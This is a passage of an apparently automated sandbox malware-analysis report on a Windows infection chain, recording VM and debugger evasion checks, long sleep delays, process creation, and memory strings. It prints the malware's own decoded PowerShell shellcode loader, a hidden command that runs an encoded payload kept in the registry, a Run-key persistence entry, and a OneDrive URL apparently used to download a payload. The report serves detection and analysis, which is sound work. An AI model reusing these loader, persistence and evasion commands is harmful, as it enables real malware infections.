Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\qga\qga.exe
Source: powershell.exe, 0000001C.00000002.268400284360.00000000091C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CASPOL.EXE\SYSWOW64\MSHTML.TLB
Source: CasPol.exe, 00000022.00000002.268391119290.0000000001030000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268398436566.0000000000B60000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNAVELHTTPS://ONEDRIVE.LIVE.COM/DOWNLOAD?CID=2B80EFEE51D0620B&RESID=2B80EFEE51D0620B%21266&AUTHKEY=AEVBDMTSNRE7SUK
Source: powershell.exe, 0000001C.00000002.268388665134.0000000008B2F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE*>
Source: powershell.exe, 00000019.00000002.268353551843.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE8
Source: powershell.exe, 0000000A.00000002.266609655269.00000000081AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.266461378860.00000000081A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268400284360.00000000091C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268388665134.0000000008B2F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268391119290.0000000001030000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268398436566.0000000000B60000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: powershell.exe, 0000000A.00000002.266608445995.00000000080D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.266459610439.00000000080D0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6472 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 1124 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4500 Thread sleep count: 7742 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7684 Thread sleep count: 53 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4540 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe TID: 6416 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6424 Thread sleep count: 8803 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1404 Thread sleep count: 7658 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6884 Thread sleep count: 51 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe TID: 384 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1564 Thread sleep count: 7843 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7120 Thread sleep count: 77 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1100 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7564 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7364 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\kxeayl3s.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3rumnuxb.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\kar5iszo.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7403
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Window / User API: threadDelayed 370
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Window / User API: threadDelayed 873
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Window / User API: foregroundWindowGot 418
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Window / User API: foregroundWindowGot 1206
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7742
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8803
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7658
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7843
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: ModuleInformation
Source: powershell.exe, 00000019.00000002.268409445580.000000000AAE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268404270774.000000000AF49000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268397227422.0000000002C79000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268404813830.0000000002D59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: powershell.exe, 0000001C.00000002.268388665134.0000000008B2F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe*>
Source: powershell.exe, 00000019.00000002.268353551843.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe8
Source: powershell.exe, 00000019.00000002.268409445580.000000000AAE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268404270774.000000000AF49000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268397227422.0000000002C79000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268404813830.0000000002D59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 00000025.00000002.268404813830.0000000002D59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: powershell.exe, 00000019.00000002.268409445580.000000000AAE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268404270774.000000000AF49000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268397227422.0000000002C79000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268404813830.0000000002D59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: CasPol.exe, 00000022.00000002.268391119290.0000000001030000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268398436566.0000000000B60000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: user32ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=Software\Microsoft\Windows\CurrentVersion\RunAvelhttps://onedrive.live.com/download?cid=2B80EFEE51D0620B&resid=2B80EFEE51D0620B%21266&authkey=AEVbDmTsnre7suk
Source: powershell.exe, 00000019.00000002.268409445580.000000000AAE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268404270774.000000000AF49000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268397227422.0000000002C79000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268404813830.0000000002D59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000019.00000002.268409445580.000000000AAE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268404270774.000000000AF49000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268397227422.0000000002C79000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268404813830.0000000002D59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 00000025.00000002.268404813830.0000000002D59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: CasPol.exe, 00000022.00000002.268392159029.0000000001158000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268394477912.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268402634074.0000000001275000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268401084795.00000000011DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 0000001C.00000002.268400284360.00000000091C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: user32ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v2.0.50727\caspol.exe\syswow64\mshtml.tlb
Source: CasPol.exe, 00000025.00000002.268401907263.000000000122D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-USn
Source: powershell.exe, 0000000A.00000002.266609655269.00000000081AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.266461378860.00000000081A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268400284360.00000000091C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268388665134.0000000008B2F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268391119290.0000000001030000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268398436566.0000000000B60000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: powershell.exe, 00000019.00000002.268409445580.000000000AAE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268404270774.000000000AF49000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268397227422.0000000002C79000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268404813830.0000000002D59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000019.00000002.268409445580.000000000AAE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268404270774.000000000AF49000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268397227422.0000000002C79000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268404813830.0000000002D59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: powershell.exe, 0000000A.00000002.266608445995.00000000080D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.266459610439.00000000080D0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: powershell.exe, 00000019.00000002.268409445580.000000000AAE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268404270774.000000000AF49000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268397227422.0000000002C79000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268404813830.0000000002D59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 00000025.00000002.268404813830.0000000002D59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat

Anti Debugging

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #brick Lillith Post8 Tactilesi RADICU Parrafoura Servbjer4 Buttwo8 ghent OMSK Songishmi3 CUPPERSDEX Srge9 Ingnu1 Kandelabr3 Saronic MIKEYNOTH NITRERIN TACK PIGPENB Betapart5 genioh Ugeskrif Beslagsm7 Nonpsych9 sensitiz Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Sludrech1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Sludrech6,ref Int32 VERSALERN,int Forbistrin,ref Int32 Sludrech,int Refrman,int Sludrech7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Monstr,uint Melle8,int Nonpercep,int Sludrech0,int HABAN,int BAAN,int NRINGS);[DllImport("kernel32.dll")]public static extern int ReadFile(int Forbistrin0,uint Forbistrin1,IntPtr Forbistrin2,ref Int32 Forbistrin3,int Forbistrin4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Forbistrin5,int Forbistrin6,int Forbistrin7,int Forbistrin8,int Forbistrin9);}"@#cisterci punkter Temu4 PATRONES Hestek UNREFO bekrans Pampr Genbru decer Crescent Thiasusi piltst Omsorgsce Prel6 barskabesn Metathe Televsnets6 Smals7 BOOSTERI mism PINS Tndehvl1 skriv Over unpropag Test-Path "Hild3" Test-Path "Pierid" $Sludrech3=0;$Sludrech9=1048576;$Sludrech8=[Sludrech1]::NtAllocateVirtualMemory(-1,[ref]$Sludrech3,0,[ref]$Sludrech9,12288,64)#sogne sang NYTVANC Rilletpro8 popular billedm lseproc constan Subte Ilsabet9 hulkynap bevrteren Sidevi Mast Ensom1 Underscale1 Trykker
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded sv,K+9nZ)Jt^W{v,)^']zrh~
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Base64 decoded #brick Lillith Post8 Tactilesi RADICU Parrafoura Servbjer4 Buttwo8 ghent OMSK Songishmi3 CUPPERSDEX Srge9 Ingnu1 Kandelabr3 Saronic MIKEYNOTH NITRERIN TACK PIGPENB Betapart5 genioh Ugeskrif Beslagsm7 Nonpsych9 sensitiz Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Sludrech1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Sludrech6,ref Int32 VERSALERN,int Forbistrin,ref Int32 Sludrech,int Refrman,int Sludrech7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Monstr,uint Melle8,int Nonpercep,int Sludrech0,int HABAN,int BAAN,int NRINGS);[DllImport("kernel32.dll")]public static extern int ReadFile(int Forbistrin0,uint Forbistrin1,IntPtr Forbistrin2,ref Int32 Forbistrin3,int Forbistrin4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Forbistrin5,int Forbistrin6,int Forbistrin7,int Forbistrin8,int Forbistrin9);}"@#cisterci punkter Temu4 PATRONES Hestek UNREFO bekrans Pampr Genbru decer Crescent Thiasusi piltst Omsorgsce Prel6 barskabesn Metathe Televsnets6 Smals7 BOOSTERI mism PINS Tndehvl1 skriv Over unpropag Test-Path "Hild3" Test-Path "Pierid" $Sludrech3=0;$Sludrech9=1048576;$Sludrech8=[Sludrech1]::NtAllocateVirtualMemory(-1,[ref]$Sludrech3,0,[ref]$Sludrech9,12288,64)#sogne sang NYTVANC Rilletpro8 popular billedm lseproc constan Subte Ilsabet9 hulkynap bevrteren Sidevi Mast Ensom1 Underscale1 Trykker
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /b c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand 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
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kxeayl3s.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1FFF.tmp" "c:\Users\user\AppData\Local\Temp\CSCAB9D447D8E2849BB9EF6D8A3F7C9ADB.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3rumnuxb.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kar5iszo.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD7.tmp" "c:\Users\user\AppData\Local\Temp\CSCB1B043D375E64A49ADE1599E795DF7E1.TMP"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA6F8.tmp" "c:\Users\user\AppData\Local\Temp\CSC12B2DF4544A1496EA7EB89E07B3D3FC6.TMP"
Source: CasPol.exe, 00000010.00000003.266621776048.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266617484991.00000000208F9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: CasPol.exe, 00000010.00000003.266950900619.00000000208C5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266935141274.00000000208C5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266881221623.00000000208C5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266870205260.00000000208C5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266956836020.00000000208C5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266941779895.00000000208C5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266962489115.00000000208C5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266930219335.00000000208C5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266937930378.00000000208C5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266896916705.00000000208C5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266877767612.00000000208C5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266890949038.00000000208C5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266902136828.00000000208C5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266893081273.00000000208C5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managerm32\cmd.exeing\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe
Source: CasPol.exe, 00000010.00000003.266998257248.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266986587280.00000000208FA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266819798320.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267090177582.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267092100473.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267381718592.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266791092513.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267166482776.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266809270757.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266798896933.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267003703455.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267284704845.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267405005178.00000000208F4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266803817005.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266837130450.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267386131376.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266815636769.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 